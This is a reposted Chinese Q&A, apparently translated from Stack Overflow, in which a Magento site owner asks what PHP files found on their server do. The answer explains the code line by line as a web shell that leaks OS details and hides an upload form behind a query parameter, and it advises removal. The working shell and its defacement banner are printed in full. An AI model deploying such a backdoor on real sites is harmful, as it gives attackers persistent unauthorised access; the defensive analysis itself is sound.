我的Magento网站被黑了,这个php代码做了什么?
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了我的Magento网站被黑了,这个php代码做了什么?,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含2336字,纯文字阅读大概需要4分钟。
内容图文
![我的Magento网站被黑了,这个php代码做了什么?](/upload/InfoBanner/zyjiaocheng/759/ccbb48349b334e5aa320fe6519dbb007.jpg)
我刚刚在我的托管上发现了一些php文件,在php中有0.01%的知识,有人可以解释一下这段代码的作用吗?
<?php if(isset($_GET["ourzr"])){
echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";
echo"<form method=post enctype=multipart/form-data>";
echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>berhasil</b>-->".$_FILES["f"]["name"];
}else{
echo"<b>gagal";}
}
}?>
<title>Hacked by d3b~X</title>
<center>
<div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
<style>
body{overflow:hidden;background-color:black}
#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}
解决方法:
代码细分:
如果查询字符串中的变量有值(即index.php?ourzr = set)
<?php
if(isset($_GET["ourzr"])){
然后使用功能php_uname()显示有关服务器操作系统的信息.他们使用此信息将下一轮攻击定位到您的系统细节.
echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";
创建一个允许上传更多黑客文件的html表单
echo"<form method=post enctype=multipart/form-data>";
echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
如果已上载文件,请将文件从临时文件夹复制到普通文件夹,而不包含临时名称但原始名称
if($_POST["v"]==up){
if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>sucess</b>-->".$_FILES["f"]["name"];
}else{
echo"<b>failed</b>";
}
}
}
?>
这部分只是一个小小的消息说“我是来自歹徒队员的kool脚本小子”
<title>Hacked by d3b~X</title>
<center>
<div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
<style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}
结论:
尽快删除此文件
此脚本以某种方式通过可能仍然存在的漏洞上传到您的服务器(除非黑客足够好以便为您修复它).
他们发现将这个文件放在您可以访问它的服务器上,现在他们想用它来继续上传脚本和其他恶意数据.删除此文件,并查看网站上传任何类型文件的任何位置.
下一步:
了解黑客如何使用文件上传来上传这些脚本,以及他们可以使用自己的上传表单执行的其他操作:
https://www.acunetix.com/websitesecurity/upload-forms-threat/
阅读有关如何创建安全上载脚本的信息:There are many other tutorials
阅读更多关于安全性的信息,并尝试学习一些PHP.如果您有任何更具体的问题,请告诉我
追捕这个家伙我猜:https://twitter.com/d3b_x
内容总结
以上是互联网集市为您收集整理的我的Magento网站被黑了,这个php代码做了什么?全部内容,希望文章能够帮你解决我的Magento网站被黑了,这个php代码做了什么?所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。